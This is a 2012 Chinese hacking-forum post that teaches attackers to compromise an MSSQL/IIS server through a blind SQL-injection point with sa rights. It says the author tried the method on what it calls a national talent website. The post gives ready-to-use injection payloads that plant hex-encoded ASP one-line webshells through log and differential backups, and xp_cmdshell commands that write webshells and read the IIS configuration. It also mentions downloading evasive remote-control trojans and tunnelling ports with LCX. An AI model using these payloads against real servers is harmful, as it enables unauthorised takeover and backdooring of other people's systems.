找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2121|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
8 \- P% {9 h) f* t) A! M' D1 x( q( x8 I! Q3 S, _4 `3 I
4 _/ r0 D8 T( M) h% C
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
/ @" H1 y" K0 j: u0 I0 j! }* f# ~9 {3 G
                                                                 . }' r% L& g+ S+ f* T7 C8 Y* T
                                                                 
  @2 o% p+ P: `) Q                                                                  论坛: http://www.90team.net/
& ?; g0 y6 n1 R/ q/ d* Y
9 H# W2 \0 A+ L
. g+ |5 P, T, \" X: [
" O( Y, ~( P: w! x8 B8 D8 q: d友情检测国家人才网1 F4 P) F+ z: [' a1 j+ c
: g9 n: N* N* l/ h3 B3 j
5 ]: Z# W# ?8 f" C& ?# A. g" K
内容:MSSQL注入SA权限不显错模式下的入侵' F4 D- S0 M. R

% K5 u0 B  g/ U
. X  J2 D$ P, N8 g# ~9 g# `' B一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
/ u. C( f( M( O& L; m5 f- X" j' v; v( E) ~. x, h! ^& w" M
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。; G5 H) q( g0 V# @. Z5 I
- C/ }) s# |) @2 C* E9 C! ~+ w

# R) q7 t7 E6 Y, O% y这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
1 H: b) @6 K# Y) P: e' g* n
1 y% N/ ^+ B  {; D  ~7 m1 |$ S2 f思路:8 u; }7 v- @& O
% F, J- d9 `/ N0 ~8 t, s" v6 ^
首先:
/ H4 N& }4 ~# i* A4 r( G9 U& i8 S( n8 `
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
' `: u  J$ Q& p) T+ x
8 A2 s* Q" w! g( B1 p2 D1 Z' S1.日志备份获得Webshell
. I% ~, g& |) U4 v8 n" l) u  t1 C& `: w4 F% f+ c
2.数据库差异备份获得Webshell
* b  W5 \! Z# S2 ^( s" ~+ d- x1 k
* K  A, c  z0 b4.直接下载免杀远控木马。
" }1 E* y% `* W- a3 T) y# ?4 v) m: y& L
5.直接下载LCX将服务器端口转发出来/ e, g( x7 a# j

& g! V3 M! t# \: U6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
  N0 X/ [! o( x7 L* g8 c1 f- B* C3 p- K4 Z7 Q4 N% r1 A5 a% `

; L% _! h* o* ]* B% T* s: `7 L8 K$ I
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
( B9 R2 Q' Q; G- O1 \% z% o
+ o' B4 M: ]( x- m2 e我直接演示后面一个方法! X% e! y. ]) j. x- Y6 v( @0 L

  ?( X; y4 q) x; r, M. H
4 |- U/ R4 _8 X! }- l分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 9 c; a- r5 _- d0 t7 T1 ~% |
5 p6 q: e9 M) Q: \" W" h
' f, K: M; W3 G2 y" Z9 J8 ]
2 d0 A1 w' j! L0 B4 o
4 B8 T4 n1 g4 d4 v
◆日志备份:
' H$ S- I2 d$ m  n2 J3 v
; p+ P" V8 x2 |# e' \1 U
2 y8 b5 J# f/ M' k* ~  z) d2 k1. 进行初始备份
( y+ h: q! m! x; v6 v6 ^, N; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--2 ~% u; `+ @( h7 A$ @2 o5 t
: W& |, d' w& Q! j9 B$ ^
2. 插入数据* w2 N  U1 k( k' o1 l/ \  V
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--/ v3 I, s% o0 O; o- l

, |2 a2 j# P% [3 R# Z( g& ]0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
2 `, b5 Z, A) v$ K4 _' }- K  F% m$ y/ j  
1 u8 E# i$ M5 |  m5 r# U3 g1 Y  K4 q3. 备份并获得文件,删除临时表+ }  s4 z& i: l
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--3 J3 i: d+ t- I4 y
. D, n/ [$ E+ O6 r* _9 I' j

! M) l% F4 [) x
: q5 c8 ^- p, ~/ J5 w. W) |; t◆数据库差异备份# ^/ W* q* Y$ Z1 L; Y- E, q, P
$ z3 _3 a3 ?. O6 `
(1. 进行差异备份准备工作4 T# {. `  L/ M) C+ t: N& g$ E
# C( m1 Y/ S0 Q, d2 n8 |% o
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
9 ^( U6 J+ |+ C
! s: m+ a3 A) l: [上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
" m6 {6 T* K% w; f7 V . a6 z' `0 `5 A5 ?' d

0 E3 _: H# U, ^(2. 将数据写入到数据库% B0 n2 J7 Q5 I. i1 b' L
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
  A' \* Y5 d4 G
, B6 i/ D& B" J1 r" v0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>& S  ]' s9 ?1 p; y0 ^! M- @& {

" L9 [  V: L0 y* s# R3. 备份数据库并清理临时文件
$ b- Y' z* G, _+ }; V5 L  e% m5 U+ z) m5 }* L6 f
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--9 r2 r# U4 B9 a0 c/ a
6 B+ ]1 `+ {9 `+ ~! B+ S/ j$ A
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 / k- \9 s. S- y

# G6 d7 X" ]8 t0 j/ H& j! m
& S/ N! [( v; c7 ^' O+ o4 {- t8 J* b' Q' Z
用^转义字符来写ASP(一句话木马)文件的方法:   8 r" v2 o7 \4 g7 ]/ \! S: i

" D4 v1 g1 i3 H3 y; P1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
& j3 a' |9 P# N5 l$ ?3 B7 w. K) _9 S/ K
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
+ ^* X+ R! r' C- K% e4 R
8 ?$ C. g1 g% a( y! X读取IIS配置信息获取web路径0 Z* A; U; |+ d4 N9 ~7 b2 i

) b' i9 I2 K! K" V1 H     
) a* [  n  Z9 w# M: o     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
( f6 R8 N" F, k+ n4 h' H3 f' S& \! ?9 ]
执行命令( z- e% k1 w/ }/ b
     
4 S) `2 z; E8 v' E     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--( j2 {. ?0 h; Y! a$ O" M3 p
" }) [7 c: N! c9 c4 k. |4 `

2 Y8 Q4 X$ s8 C5 r( i' I& U& b6 `/ P$ I
! v: Z' \' X7 G9 m7 C
. n( }+ R$ _' W& k* I6 x9 y0 n% K
4 w$ E' D5 L( Z2 W
3 N0 r* F: k1 i) L& S# [" B$ D) ]1 T" A
) I; [4 @) x  c$ j2 s1 f0 K  q8 u; n3 N

5 T% d. |% h" q/ a* y
; }$ m0 e# m2 E5 p
/ w0 ]. f# L& ^0 C  ^+ Q, `  |( n; h: B2 P. I! D0 @
" r: e# h% I! R8 D0 e* s' G
$ `' c. F, f  z9 f% r

5 ^/ n9 ^- p! V! G9 K1 B" v! L; J! ?/ s# s: l5 s1 z0 T

& a% p' J( H$ v. R
. E5 x7 |* ?7 f& ^* s7 P! T6 m& l) d6 b- ]' G- d

4 {0 G7 _& `6 C5 Y* e" _( ?; Q0 F  a/ M4 ?. `. \
  U, ~1 C8 E/ G9 q

, l' G3 q$ w6 C
3 k9 T9 }+ |2 ]6 t( P" ?5 u) I4 [/ _. a0 ^: y- ^

3 r1 {: B) v! O4 n  V6 x) ^2 y& j3 F& |" d- ?

  |, M$ f/ t% c' Y" }0 o" G2 `: ~7 T9 T" ?' w$ z3 P$ K
6 ^: T+ e' {: [& B7 t
; p) c; T/ X0 v

$ t+ X3 V9 c; i& d9 D% Z6 E1 [3 s: i# W& k
) A' j9 D! w1 m6 r7 n

* |/ p$ K- J. y! a2 ?+ X/ p* w$ K$ n5 U* j  F2 m- A1 P. m0 ^

0 Y% g% N3 t# L
. v$ N7 v' K: Z: j9 k5 e, K( Y7 J: w6 A7 T! q6 u/ w. i0 x4 _" r/ O  }

. _: A4 Q+ |3 l, r' J6 i' r1 g. \' B/ l, `5 ?0 c$ _

7 F6 J2 j; \0 k% H$ p  j
$ {5 O7 @5 Z# e5 @3 {- y$ c
* G/ o3 b; I) t/ n# T
' X2 R* X2 a/ t. t2 l. [
% g  s' s; V$ ~# ~) j$ p' H* ?$ ~" U: U& M4 t4 m& x* t3 H
, `( Y- w7 u6 E0 w  v! Y; J. Q8 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表